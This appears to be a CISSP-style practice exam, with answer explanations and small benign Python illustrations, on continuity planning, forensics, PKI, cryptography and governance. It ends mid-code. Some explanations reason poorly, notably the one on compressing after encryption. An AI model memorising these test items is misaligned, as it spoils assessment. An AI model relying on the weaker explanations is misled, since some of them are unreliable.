During an audit, an organization is found to lack the ability to properly establish performance indicators for its Web hosting solution. What would be the MOST probable cause?
Absence of a Business Intelligence (BI) solution
Inadequate cost modeling
Improper deployment of the Service-Oriented Architecture (SOA)
Insufficient Service Level Agreement (SLA)
Insufficient Service Level Agreement (SLA) would be the most probable cause for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit. A Web hosting solution is a service that provides the infrastructure, resources, and tools for hosting and maintaining a website or a web application on the internet.
A Service Level Agreement (SLA) is a contract or an agreement that defines the expectations, responsibilities, and obligations of the parties involved in a service, such as the service provider and the service consumer. An SLA typically includes components such as service level indicators, service level objectives, service level reporting, and service level penalties.
Insufficient SLA would be the most probable cause because it could mean that the SLA does not include or specify the appropriate service level indicators or objectives for the Web hosting solution, or that it does not provide or enforce adequate service level reporting or penalties. This could affect the organization’s ability to measure and assess the quality, performance, and availability of the Web hosting solution, and to identify and address any issues or risks in it.
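To make this concrete, the service level indicators and objectives from an SLA can be written down as measurable targets and checked against observed values. The following is a minimal, hypothetical sketch in Python; the metric names and thresholds are illustrative assumptions, not taken from any particular SLA or standard.

```python
# Hypothetical SLA targets for a Web hosting service (illustrative values only).
SLA_OBJECTIVES = {
    "availability_percent": 99.9,    # minimum monthly uptime
    "avg_response_ms": 500,          # maximum average page response time
    "sev1_resolution_hours": 4,      # maximum time to resolve a severity-1 incident
}

def check_sla(measured: dict) -> list:
    """Return the list of SLA objectives that the measured values violate."""
    violations = []
    if measured["availability_percent"] < SLA_OBJECTIVES["availability_percent"]:
        violations.append("availability below target")
    if measured["avg_response_ms"] > SLA_OBJECTIVES["avg_response_ms"]:
        violations.append("response time above target")
    if measured["sev1_resolution_hours"] > SLA_OBJECTIVES["sev1_resolution_hours"]:
        violations.append("incident resolution too slow")
    return violations

print(check_sla({"availability_percent": 99.5,
                 "avg_response_ms": 420,
                 "sev1_resolution_hours": 6}))
# ['availability below target', 'incident resolution too slow']
```

Without such explicit, measurable targets in the SLA, an auditor has nothing to evaluate the hosting service against, which is exactly the gap described above.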
The other options are not the most probable causes, but rather factors that could affect or improve the Web hosting solution in other ways.

Absence of a Business Intelligence (BI) solution could affect the organization’s ability to analyze and utilize the data and information from the Web hosting solution, such as web traffic, behavior, or conversion. A BI solution collects, integrates, processes, and presents data and information from various sources, such as the Web hosting solution, to support the organization’s decision making and planning. However, its absence does not affect the definition or specification of the performance indicators for the Web hosting solution, only their analysis or usage.

Inadequate cost modeling could affect the organization’s ability to estimate and optimize the cost and value of the Web hosting solution, such as the hosting fees, maintenance costs, or return on investment. A cost model is a tool or method that helps the organization calculate and compare the cost and value of candidate solutions and identify the most efficient one. However, inadequate cost modeling does not affect the definition or specification of the performance indicators, only the estimation or optimization of cost and value.

Improper deployment of the Service-Oriented Architecture (SOA) could affect the organization’s ability to design and develop the Web hosting solution, such as its web services, components, or interfaces. A SOA is a software architecture that modularizes, standardizes, and integrates the software components or services that provide the solution’s functionality or logic. However, improper deployment of the SOA does not affect the definition or specification of the performance indicators, only the design or development of the Web hosting solution.
What should be the FIRST action to protect the chain of evidence when a desktop computer is involved?
Take the computer to a forensic lab
Make a copy of the hard drive
Start documenting
Turn off the computer
Making a copy of the hard drive should be the first action to protect the chain of evidence when a desktop computer is involved. A chain of evidence, also known as a chain of custody, is a process that documents and preserves the integrity and authenticity of the evidence collected from a crime scene, such as a desktop computer. A chain of evidence should include information such as who collected the evidence, when and where it was collected, how it was handled and stored, and who had access to it at each step.
Making a copy of the hard drive should be the first action to protect the chain of evidence when a desktop computer is involved, because it ensures that the original hard drive is not altered, damaged, or destroyed during the forensic analysis, and that the copy can be used as a reliable and admissible source of evidence. Making a copy of the hard drive should also involve using a write blocker, which is a device or software tool that prevents any modification or deletion of the data on the hard drive, and generating a hash value, which is a unique, fixed-length identifier that can verify the integrity and consistency of the data on the hard drive.
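As a simple illustration of the hashing step, the following Python sketch computes a SHA-256 digest of a disk image file in fixed-size chunks. The file paths are hypothetical; real acquisitions use a hardware write blocker and dedicated imaging tools, hashing both the original and the copy to prove they match.

```python
import hashlib

def hash_image(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Compute the SHA-256 digest of a disk image, reading in chunks so that
    arbitrarily large images never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

# Matching digests demonstrate the copy is bit-for-bit identical to the
# original and that neither has been altered since acquisition:
# assert hash_image("/evidence/original.dd") == hash_image("/evidence/copy.dd")
```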
The other options are not the first actions to protect the chain of evidence when a desktop computer is involved, but rather actions that should be done after or alongside making a copy of the hard drive. Taking the computer to a forensic lab should be done after making a copy of the hard drive, because it ensures that the computer is transported and stored in a secure and controlled environment, and that the forensic analysis is conducted by qualified and authorized personnel. Documenting should be done alongside making a copy of the hard drive, because it ensures that the chain of evidence is maintained and recorded throughout the forensic process, and that the evidence can be traced and verified. Turning off the computer should be done after making a copy of the hard drive, because it ensures that the computer is powered down and disconnected from any network or device, and protected from further damage or tampering.
What is the PRIMARY reason for implementing change management?
Certify and approve releases to the environment
Provide version rollbacks for system changes
Ensure that all applications are approved
Ensure accountability for changes to the environment
Ensuring accountability for changes to the environment is the primary reason for implementing change management. Change management is a process that ensures that any changes to the system or network environment, such as the hardware, software, configuration, or documentation, are planned, approved, implemented, and documented in a controlled and consistent manner. Change management can provide several benefits, such as reducing the risk of errors and outages, preventing unauthorized or malicious changes, and providing an audit trail of what changed, when, why, and by whom.
Ensuring accountability for changes to the environment is the primary reason for implementing change management, because it can ensure that the changes are authorized, justified, and traceable, and that the parties involved in the changes are responsible and accountable for their actions and results. Accountability can also help to deter or detect any unauthorized or malicious changes that might compromise the system or network environment.
The other options are not the primary reasons for implementing change management, but rather secondary or specific reasons for different aspects or phases of change management. Certifying and approving releases to the environment is a reason for implementing change management, but it is more relevant for the approval phase of change management, which is the phase that involves reviewing and validating the changes and their impacts, and granting or denying the permission to proceed with the changes. Providing version rollbacks for system changes is a reason for implementing change management, but it is more relevant for the implementation phase of change management, which is the phase that involves executing and monitoring the changes and their effects, and providing the backup and recovery options for the changes. Ensuring that all applications are approved is a reason for implementing change management, but it is more relevant for the application changes, which are the changes that affect the software components or services that provide the functionality or logic of the system or network environment.
Recovery strategies of a Disaster Recovery Plan (DRP) MUST be aligned with which of the following?
Hardware and software compatibility issues
Applications’ criticality and downtime tolerance
Budget constraints and requirements
Cost/benefit analysis and business objectives
Recovery strategies of a Disaster Recovery Plan (DRP) must be aligned with the cost/benefit analysis and business objectives. A DRP is the part of business continuity and disaster recovery planning that focuses on restoring the normal operation of the organization’s IT systems and infrastructure after a disruption or disaster. A DRP should include components such as the recovery objectives, the recovery strategies, the roles and responsibilities, and the testing and maintenance procedures.
Recovery strategies of a DRP must be aligned with the cost/benefit analysis and business objectives, because this ensures that the DRP is feasible and suitable, and that it can achieve the desired outcomes and objectives in a cost-effective and efficient manner. A cost/benefit analysis is a technique that compares the costs and benefits of different recovery strategies, and determines the optimal one that provides the best value for money. A business objective is a goal or target that the organization wants to achieve through its IT systems and infrastructure, such as increasing productivity, profitability, or customer satisfaction. A recovery strategy that is aligned with the cost/benefit analysis and business objectives can help to minimize downtime and losses, prioritize the recovery of the most critical systems, and justify the investment in recovery resources.
The other options are not the factors that the recovery strategies of a DRP must be aligned with, but rather factors that should be considered or addressed when developing or implementing the recovery strategies of a DRP. Hardware and software compatibility issues are factors that should be considered when developing the recovery strategies of a DRP, because they can affect the functionality and interoperability of the IT systems and infrastructure, and may require additional resources or adjustments to resolve them. Applications’ criticality and downtime tolerance are factors that should be addressed when implementing the recovery strategies of a DRP, because they can determine the priority and urgency of the recovery for different applications, and may require different levels of recovery objectives and resources. Budget constraints and requirements are factors that should be considered when developing the recovery strategies of a DRP, because they can limit the availability and affordability of the IT resources and funds for the recovery, and may require trade-offs or compromises to balance them.
When is a Business Continuity Plan (BCP) considered to be valid?
When it has been validated by the Business Continuity (BC) manager
When it has been validated by the board of directors
When it has been validated by all threat scenarios
When it has been validated by realistic exercises
A Business Continuity Plan (BCP) is considered to be valid when it has been validated by realistic exercises. A BCP is the part of business continuity planning that focuses on ensuring the continuous operation of the organization’s critical business functions and processes during and after a disruption or disaster. A BCP should include components such as the business impact analysis, the recovery strategies, the roles and responsibilities, the testing, training, and exercises, and the maintenance and review procedures.
A BCP is considered to be valid when it has been validated by realistic exercises, because this ensures that the BCP is practical and applicable, and that it can achieve the desired outcomes and objectives in a real-life scenario. Realistic exercises are a form of testing, training, and exercising that involves performing and practicing the BCP with the relevant stakeholders, using simulated or hypothetical scenarios, such as a fire drill, a power outage, or a cyberattack. Realistic exercises can provide several benefits, such as revealing gaps or weaknesses in the plan, familiarizing staff with their roles and responsibilities, and building confidence that the plan will work under real conditions.
The other options are not the criteria for considering a BCP to be valid, but rather the steps or parties that are involved in developing or approving a BCP.

Validation by the Business Continuity (BC) manager is not a criterion, but rather a step in developing a BCP. The BC manager is the person responsible for overseeing and coordinating the BCP activities and processes, such as the business impact analysis, the recovery strategies, the BCP document, the testing, training, and exercises, and the maintenance and review. The BC manager can validate the BCP by reviewing and verifying its components and outcomes, and ensuring that they meet the BCP standards and objectives. However, validation by the BC manager alone is not enough, as it does not test or demonstrate the BCP in a realistic scenario.

Validation by the board of directors is likewise not a criterion, but rather an approval step. The board of directors is the group of people elected by the shareholders to represent their interests and to oversee the strategic direction and governance of the organization. The board can approve the BCP by endorsing and supporting its components and outcomes, and allocating the necessary resources and funds. However, approval by the board is not enough, as it does not test or demonstrate the BCP in a realistic scenario.

Validation by all threat scenarios is not a criterion either, but rather an unrealistic expectation. A threat scenario is a description or simulation of a possible disruption or disaster that might affect the organization’s critical business functions and processes, such as a natural hazard, a human error, or a technical failure. Threat scenarios can be used to test the BCP by measuring and evaluating its performance and effectiveness in responding to and recovering from the disruption. However, it is not feasible to validate the BCP against all threat scenarios, as there are too many possible or unknown scenarios, and some would be too severe or complex to simulate. The BCP should therefore be validated against the most likely or relevant threat scenarios, not all of them.
Which of the following types of business continuity tests includes assessment of resilience to internal and external risks without endangering live operations?
Walkthrough
Simulation
Parallel
White box
Simulation is the type of business continuity test that includes assessment of resilience to internal and external risks without endangering live operations. Business continuity is the ability of an organization to maintain or resume its critical functions and operations in the event of a disruption or disaster. Business continuity testing is the process of evaluating and validating the effectiveness and readiness of the business continuity plan (BCP) and the disaster recovery plan (DRP) through various methods and scenarios. Business continuity testing can provide several benefits, such as verifying that the plans work as intended, identifying gaps or weaknesses in them, and training staff on their roles and responsibilities.
There are different types of business continuity tests, depending on the scope, purpose, and complexity of the test. Some of the common types are the checklist review, the walkthrough (or tabletop) test, the simulation test, the parallel test, and the full-interruption test.
Simulation is the type of business continuity test that includes assessment of resilience to internal and external risks without endangering live operations, because it can simulate various types of risks, such as natural, human, or technical, and assess how the organization and its systems can cope and recover from them, without actually causing any harm or disruption to the live operations. Simulation can also help to identify and mitigate any potential risks that might affect the live operations, and to improve the resilience and preparedness of the organization and its systems.
The other options are not types of business continuity tests that include assessment of resilience to internal and external risks without endangering live operations, but rather types with other objectives or effects. Walkthrough does not assess resilience to internal and external risks; it is a review and discussion of the BCP and DRP, without any actual testing or practice. Parallel does not endanger live operations, but rather maintains them while activating and operating the alternate site or system; it exercises the alternate capability rather than simulating risk scenarios. White box is not a type of business continuity test at all, but a software testing method that examines the internal structure and logic of an application. (A full-interruption test, by contrast, does endanger live operations, by shutting them down and transferring them to the alternate site or system.)
Which security service is served by the process of encrypting plaintext with the sender’s private key and decrypting the ciphertext with the sender’s public key?
Confidentiality
Integrity
Identification
Availability
The security service that is served by the process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key is identification. Identification is the process of verifying the identity of a person or entity that claims to be who or what it is. Identification can be achieved by using public key cryptography and digital signatures, which are based on this process. It works as follows: the sender encrypts the message (or, in practice, a hash of the message) with their private key, producing a ciphertext or digital signature that only the holder of that private key could have created; the receiver then decrypts it with the sender’s public key, and a successful decryption confirms that the message originated from the claimed sender.
The process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key serves identification because it ensures that only the sender can produce a valid ciphertext that can be decrypted by the receiver, and that the receiver can verify the sender’s identity by using the sender’s public key. This process also provides non-repudiation, which means that the sender cannot deny sending the message or the receiver cannot deny receiving the message, as the ciphertext serves as a proof of origin and delivery.
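The mechanism can be sketched with the Python cryptography package. Note one practical refinement the sketch makes explicit: real systems sign a hash of the message (here via RSA-PSS) rather than literally encrypting the whole plaintext with the private key, but the security property is the one described above: only the private-key holder can produce a signature that the public key verifies.

```python
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature

# The sender generates a key pair; the public key is distributed to receivers.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

message = b"transfer approved by alice"

# "Encrypting with the private key": the sender signs the message.
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)
signature = private_key.sign(message, pss, hashes.SHA256())

# "Decrypting with the public key": anyone can verify the signature, which
# identifies the sender and supports non-repudiation.
try:
    public_key.verify(signature, message, pss, hashes.SHA256())
    print("valid: the message came from the private-key holder")
except InvalidSignature:
    print("invalid: the message was forged or altered")
```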
The other options are not the security services that are served by the process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key. Confidentiality is the process of ensuring that the message is only readable by the intended parties, and it is achieved by encrypting plaintext with the receiver’s public key and decrypting ciphertext with the receiver’s private key. Integrity is the process of ensuring that the message is not modified or corrupted during transmission, and it is achieved by using hash functions and message authentication codes. Availability is the process of ensuring that the message is accessible and usable by the authorized parties, and it is achieved by using redundancy, backup, and recovery mechanisms.
The use of private and public encryption keys is fundamental in the implementation of which of the following?
Diffie-Hellman algorithm
Secure Sockets Layer (SSL)
Advanced Encryption Standard (AES)
Message Digest 5 (MD5)
The use of private and public encryption keys is fundamental in the implementation of Secure Sockets Layer (SSL). SSL is a protocol that provides secure communication over the Internet by using public key cryptography and digital certificates. SSL works as follows: the client and server exchange hello messages to negotiate the protocol version and cipher suites; the server presents a digital certificate containing its public key; the client validates the certificate and uses the server’s public key to establish a shared session key; and all subsequent traffic is encrypted symmetrically with that session key.
The use of private and public encryption keys is fundamental in the implementation of SSL because it enables the authentication of the parties, the establishment of the shared secret key, and the protection of the data from eavesdropping, tampering, and replay attacks.
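A minimal client-side example using Python’s standard ssl module (which implements TLS, the modern successor to SSL) shows the public-key machinery in action: the default context validates the server’s certificate, whose embedded public key anchors the key establishment. The hostname below is an illustrative placeholder.

```python
import socket
import ssl

# The default context verifies the server's certificate chain and hostname
# against the system trust store.
context = ssl.create_default_context()

with socket.create_connection(("example.com", 443)) as sock:
    with context.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.version())          # e.g. 'TLSv1.3'
        cert = tls.getpeercert()      # the server certificate (public key inside)
        print(cert["subject"])
```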
The other options are not protocols or algorithms whose implementation is fundamentally based on private and public encryption keys. The Diffie-Hellman algorithm is a key agreement method in which each party combines its own private value with the other party’s public value to derive a shared secret; the public and private values are used for key agreement rather than for encrypting data. Advanced Encryption Standard (AES) is a symmetric encryption algorithm that uses the same single secret key for encryption and decryption. Message Digest 5 (MD5) is a hash function that produces a fixed-length output from a variable-length input using a one-way mathematical function, with no keys at all.
Which of the following is the PRIMARY risk with using open source software in a commercial software construction?
Lack of software documentation
License agreements requiring release of modified code
Expiration of the license agreement
Costs associated with support of the software
The primary risk with using open source software in a commercial software construction is license agreements requiring release of modified code. Open source software is software that uses publicly available source code, which can be seen, modified, and distributed by anyone. Open source software has some advantages, such as being affordable and flexible, but it also has some disadvantages, such as being potentially insecure or unsupported.
One of the main disadvantages of using open source software in a commercial software construction is the license agreements that govern the use and distribution of the open source software. License agreements are legal contracts that specify the rights and obligations of the parties involved in the software, such as the original authors, the developers, and the users. License agreements can vary in terms of their terms and conditions, such as the scope, the duration, or the fees of the software.
Some of the common types of license agreements for open source software are permissive licenses (such as the MIT, BSD, and Apache licenses), which impose few restrictions on reuse and redistribution, and copyleft licenses (such as the GNU General Public License), which require derivative works to be released under the same or a compatible license.
The primary risk with using open source software in a commercial software construction is license agreements requiring release of modified code, which are usually associated with copyleft licenses. This means that if a commercial software construction uses or incorporates open source software that is licensed under a copyleft license, then it must also release its own source code and any modifications or derivatives of it, under the same or compatible copyleft license. This can pose a significant risk for the commercial software construction, as it may lose its competitive advantage, intellectual property, or revenue, by disclosing its source code and allowing others to use, modify, or distribute it.
The other options are not the primary risks with using open source software in a commercial software construction, but rather secondary or minor risks that may or may not apply to the open source software. Lack of software documentation is a secondary risk with using open source software in a commercial software construction, as it may affect the quality, usability, or maintainability of the open source software, but it does not necessarily affect the rights or obligations of the commercial software construction. Expiration of the license agreement is a minor risk with using open source software in a commercial software construction, as it may affect the availability or continuity of the open source software, but it is unlikely to happen, as most open source software licenses are perpetual or indefinite. Costs associated with support of the software is a secondary risk with using open source software in a commercial software construction, as it may affect the reliability, security, or performance of the open source software, but it can be mitigated or avoided by choosing the open source software that has adequate or alternative support options.
What is the second phase of Public Key Infrastructure (PKI) key/certificate life-cycle management?
Implementation Phase
Initialization Phase
Cancellation Phase
Issued Phase
The second phase of Public Key Infrastructure (PKI) key/certificate life-cycle management is the initialization phase. PKI is a system that uses public key cryptography and digital certificates to provide authentication, confidentiality, integrity, and non-repudiation for electronic transactions. PKI key/certificate life-cycle management is the process of managing the creation, distribution, usage, storage, revocation, and expiration of keys and certificates in a PKI system. The key/certificate life-cycle management consists of six phases: pre-certification, initialization, certification, operational, suspension, and termination. The initialization phase is the second phase, where the key pair and the certificate request are generated by the end entity or the registration authority (RA). The initialization phase typically involves generating the key pair, establishing the end entity’s identity with the RA, proving possession of the private key, and preparing the certificate request for submission to the certification authority (CA).
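The two core outputs of the initialization phase, a key pair and a certificate request, can be illustrated with the Python cryptography package. The subject names below are hypothetical; in practice the request is submitted to the RA/CA for the certification phase that follows.

```python
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

# Initialization step 1: the end entity generates its key pair.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# Initialization step 2: build a certificate signing request (CSR) carrying
# the identity and public key, signed with the private key to prove possession.
csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, "www.example.com"),
        x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Example Corp"),
    ]))
    .sign(key, hashes.SHA256())
)

# The PEM-encoded CSR is what the certification phase acts on.
print(csr.public_bytes(serialization.Encoding.PEM).decode())
```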
The other options are not the second phase of PKI key/certificate life-cycle management, but rather other phases. The implementation phase is not a phase of PKI key/certificate life-cycle management, but rather a phase of PKI system deployment, where the PKI components and policies are installed and configured. The cancellation phase is not a phase of PKI key/certificate life-cycle management, but rather a possible outcome of the termination phase, where the key pair and the certificate are permanently revoked and deleted. The issued phase is not a phase of PKI key/certificate life-cycle management, but rather a possible outcome of the certification phase, where the CA verifies and approves the certificate request and issues the certificate to the end entity or the RA.
Which technique can be used to make an encryption scheme more resistant to a known plaintext attack?
Hashing the data before encryption
Hashing the data after encryption
Compressing the data after encryption
Compressing the data before encryption
Compressing the data before encryption is a technique that can be used to make an encryption scheme more resistant to a known plaintext attack. A known plaintext attack is a type of cryptanalysis where the attacker has access to some pairs of plaintext and ciphertext encrypted with the same key, and tries to recover the key or decrypt other ciphertexts. A known plaintext attack can exploit the statistical properties or patterns of the plaintext or the ciphertext to reduce the search space or guess the key. Compressing the data before encryption can reduce the redundancy and increase the entropy of the plaintext, making it harder for the attacker to find any correlations or similarities between the plaintext and the ciphertext. Compressing the data before encryption can also reduce the size of the plaintext, making it more difficult for the attacker to obtain enough plaintext-ciphertext pairs for a successful attack.
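The effect is easy to demonstrate with Python’s standard zlib module and an authenticated cipher from the cryptography package; the sketch below is illustrative, not a hardened design.

```python
import os
import zlib
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)

plaintext = b"ATTACK AT DAWN " * 100            # highly redundant plaintext

# Compression strips the redundancy, raising the entropy of what is encrypted.
compressed = zlib.compress(plaintext, level=9)
print(len(plaintext), "->", len(compressed))    # e.g. 1500 -> a few dozen bytes

nonce = os.urandom(12)                          # must be unique per message
ciphertext = aesgcm.encrypt(nonce, compressed, None)

# Decrypt, then decompress, to recover the original.
recovered = zlib.decompress(aesgcm.decrypt(nonce, ciphertext, None))
assert recovered == plaintext
```

One caveat worth noting: compress-then-encrypt is not a universal hardening measure. When an attacker can inject data alongside a secret, ciphertext lengths can leak information, which is the basis of the CRIME and BREACH attacks on compressed TLS traffic.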
The other options are not techniques that can be used to make an encryption scheme more resistant to a known plaintext attack, but rather techniques that can introduce other security issues or inefficiencies. Hashing the data before encryption is not a useful technique, as hashing is a one-way function that cannot be reversed, and the encrypted hash cannot be decrypted to recover the original data. Hashing the data after encryption is also not a useful technique, as hashing does not add any security to the encryption, and the hash can be easily computed by anyone who has access to the ciphertext. Compressing the data after encryption is not a recommended technique, as compression algorithms usually work better on uncompressed data, and compressing the ciphertext can introduce errors or vulnerabilities that can compromise the encryption.
Who in the organization is accountable for classification of data information assets?
Data owner
Data architect
Chief Information Security Officer (CISO)
Chief Information Officer (CIO)
The person in the organization who is accountable for the classification of data information assets is the data owner. The data owner is the person or entity that has the authority and responsibility for the creation, collection, processing, and disposal of a set of data. The data owner is also responsible for defining the purpose, value, and classification of the data, as well as the security requirements and controls for the data. The data owner should be able to determine the impact of the data on the mission of the organization, which means assessing the potential consequences of losing, compromising, or disclosing the data. The impact of the data on the mission of the organization is one of the main criteria for data classification, which helps to establish the appropriate level of protection and handling for the data. The data owner should also ensure that the data is properly labeled, stored, accessed, shared, and destroyed according to the data classification policy and procedures.
The other options are not the persons in the organization who are accountable for the classification of data information assets, but rather persons who have other roles or functions related to data management.

The data architect is the person or entity that designs and models the structure, format, and relationships of the data, as well as the data standards, specifications, and lifecycle. The data architect supports the data owner by providing technical guidance and expertise on the data architecture and quality.

The Chief Information Security Officer (CISO) is the person or entity that oversees the security strategy, policies, and programs of the organization, as well as the security performance and incidents. The CISO supports the data owner by providing security leadership and governance, as well as ensuring the compliance and alignment of the data security with the organizational objectives and regulations.

The Chief Information Officer (CIO) is the person or entity that manages the information technology (IT) resources and services of the organization, as well as the IT strategy and innovation. The CIO supports the data owner by providing IT management and direction, as well as ensuring the availability, reliability, and scalability of the IT infrastructure and applications.
Which component of the Security Content Automation Protocol (SCAP) specification contains the data required to estimate the severity of vulnerabilities identified by automated vulnerability assessments?
Common Vulnerabilities and Exposures (CVE)
Common Vulnerability Scoring System (CVSS)
Asset Reporting Format (ARF)
Open Vulnerability and Assessment Language (OVAL)
The component of the Security Content Automation Protocol (SCAP) specification that contains the data required to estimate the severity of vulnerabilities identified by automated vulnerability assessments is the Common Vulnerability Scoring System (CVSS). CVSS is a framework that provides a standardized and objective way to measure and communicate the characteristics and impacts of vulnerabilities. CVSS consists of three metric groups: base, temporal, and environmental. The base metric group captures the intrinsic and fundamental properties of a vulnerability that are constant over time and across user environments. The temporal metric group captures the characteristics of a vulnerability that change over time, such as the availability and effectiveness of exploits, patches, and workarounds. The environmental metric group captures the characteristics of a vulnerability that are relevant and unique to a user’s environment, such as the configuration and importance of the affected system. Each metric group has a set of metrics that are assigned values based on the vulnerability’s attributes. The values are then combined using a formula to produce a numerical score that ranges from 0 to 10, where 0 means no impact and 10 means critical impact. The score can also be translated into a qualitative rating that ranges from none to low, medium, high, and critical. CVSS provides a consistent and comprehensive way to estimate the severity of vulnerabilities and prioritize their remediation.
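The qualitative rating scale mentioned above is fixed by the CVSS v3.x specification and is simple to encode; the following Python function maps a base score to its published severity rating.

```python
def cvss_rating(score: float) -> str:
    """Map a CVSS v3.x base score (0.0-10.0) to its qualitative severity
    rating, per the published qualitative severity rating scale."""
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

for s in (0.0, 3.1, 5.4, 7.5, 9.8):
    print(s, cvss_rating(s))   # None, Low, Medium, High, Critical
```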
The other options are not components of the SCAP specification that contain the data required to estimate the severity of vulnerabilities identified by automated vulnerability assessments, but rather components that serve other purposes. Common Vulnerabilities and Exposures (CVE) is a component that provides a standardized and unique identifier and description for each publicly known vulnerability. CVE facilitates the sharing and comparison of vulnerability information across different sources and tools. Asset Reporting Format (ARF) is a component that provides a standardized and extensible format for expressing the information about the assets and their characteristics, such as configuration, vulnerabilities, and compliance. ARF enables the aggregation and correlation of asset information from different sources and tools. Open Vulnerability and Assessment Language (OVAL) is a component that provides a standardized and expressive language for defining and testing the state of a system for the presence of vulnerabilities, configuration issues, patches, and other aspects. OVAL enables the automation and interoperability of vulnerability assessment and management.
Which of the following mobile code security models relies only on trust?
Code signing
Class authentication
Sandboxing
Type safety
Code signing is the mobile code security model that relies only on trust. Mobile code is a type of software that can be transferred from one system to another and executed without installation or compilation. Mobile code can be used for various purposes, such as web applications, applets, scripts, and macros, and it can also pose various security risks, such as malicious code, unauthorized access, or data leakage. Mobile code security models are the techniques that are used to protect systems and users from the threats of mobile code. Code signing relies only on trust, which means that the security of the mobile code depends on the reputation and credibility of the code provider. Code signing works as follows: the code provider signs the mobile code with its private key and attaches a digital certificate issued by a trusted authority; the code consumer verifies the signature and the certificate, and then decides whether to trust the provider and execute the code.
Code signing relies only on trust because it does not enforce any security restrictions or controls on the mobile code, but rather leaves the decision to the code consumer. Code signing also does not guarantee the quality or functionality of the mobile code, but rather the authenticity and integrity of the code provider. Code signing can be effective if the code consumer knows and trusts the code provider, and if the code provider follows the security standards and best practices. However, code signing can also be ineffective if the code consumer is unaware or careless of the code provider, or if the code provider is compromised or malicious.
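The consumer-side check can be sketched in a few lines of Python using an Ed25519 signature; the code string is a stand-in, and a real deployment would verify a certificate chain to a trusted authority rather than a bare public key.

```python
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# Provider side: sign the mobile code with the provider's private key.
provider_key = Ed25519PrivateKey.generate()
code = b"print('hello from mobile code')"
signature = provider_key.sign(code)

# Consumer side: verify before executing. A valid signature only proves who
# published the code and that it was not altered; it says nothing about
# whether the code is safe, which is why this model rests on trust.
trusted_public_key = provider_key.public_key()
try:
    trusted_public_key.verify(signature, code)
    print("signature OK: run the code if the provider is trusted")
except InvalidSignature:
    print("signature invalid: refuse to run")
```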
The other options are not mobile code security models that rely only on trust, but rather on other techniques that limit or isolate the mobile code. Class authentication is a mobile code security model that verifies the permissions and capabilities of the mobile code based on its class or type, and allows or denies the execution of the mobile code accordingly. Sandboxing is a mobile code security model that executes the mobile code in a separate and restricted environment, and prevents the mobile code from accessing or affecting the system resources or data. Type safety is a mobile code security model that checks the validity and consistency of the mobile code, and prevents the mobile code from performing illegal or unsafe operations.
All of the following items should be included in a Business Impact Analysis (BIA) questionnaire EXCEPT questions that
determine the risk of a business interruption occurring
determine the technological dependence of the business processes
identify the operational impacts of a business interruption
identify the financial impacts of a business interruption
A Business Impact Analysis (BIA) is a process that identifies and evaluates the potential effects of natural and man-made disasters on business operations. The BIA questionnaire is a tool that collects information from business process owners and stakeholders about the criticality, dependencies, recovery objectives, and resources of their processes. The BIA questionnaire should include questions that determine the technological dependence of the business processes, identify the operational impacts of a business interruption, and identify the financial impacts of a business interruption.
The BIA questionnaire should not include questions that determine the risk of a business interruption occurring, as this is part of the risk assessment process, which is a separate activity from the BIA. The risk assessment process identifies and analyzes the threats and vulnerabilities that could cause a business interruption, and estimates the likelihood and impact of such events. The risk assessment process also evaluates the existing controls and mitigation strategies, and recommends additional measures to reduce the risk to an acceptable level.
Intellectual property rights are PRIMARILY concerned with which of the following?
Owner’s ability to realize financial gain
Owner’s ability to maintain copyright
Right of the owner to enjoy their creation
Right of the owner to control delivery method
Intellectual property rights are primarily concerned with the owner’s ability to realize financial gain from their creation. Intellectual property is a category of intangible assets that are the result of human creativity and innovation, such as inventions, designs, artworks, literature, music, software, etc. Intellectual property rights are the legal rights that grant the owner the exclusive control over the use, reproduction, distribution, and modification of their intellectual property. Intellectual property rights aim to protect the owner’s interests and incentives, and to reward them for their contribution to the society and economy.
The other options are not the primary concern of intellectual property rights, but rather the secondary or incidental benefits or aspects of them. The owner’s ability to maintain copyright is a means of enforcing intellectual property rights, but not the end goal of them. The right of the owner to enjoy their creation is a personal or moral right, but not a legal or economic one. The right of the owner to control the delivery method is a specific or technical aspect of intellectual property rights, but not a general or fundamental one.
A company whose Information Technology (IT) services are being delivered from a Tier 4 data center is preparing a companywide Business Continuity Plan (BCP). Which of the following failures should the IT manager be concerned with?
Application
Storage
Power
Network
A company whose IT services are being delivered from a Tier 4 data center should be most concerned with application failures when preparing a companywide BCP. A BCP is a document that describes how an organization will continue its critical business functions in the event of a disruption or disaster. A BCP should include a risk assessment, a business impact analysis, a recovery strategy, and a testing and maintenance plan.
A Tier 4 data center is the highest level of data center classification, according to the Uptime Institute. A Tier 4 data center has the highest level of availability, reliability, and fault tolerance, as it has multiple and independent paths for power and cooling, and redundant and backup components for all systems. A Tier 4 data center has an uptime rating of 99.995%, which means it can only experience 0.4 hours of downtime per year. Therefore, the likelihood of a power, storage, or network failure in a Tier 4 data center is very low, and the impact of such a failure would be minimal, as the data center can quickly switch to alternative sources or routes.
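The downtime figure follows directly from the availability percentage; a quick worked check, assuming 8,760 hours in a year:

```python
hours_per_year = 365 * 24                     # 8760
availability = 0.99995                        # Tier 4 uptime rating
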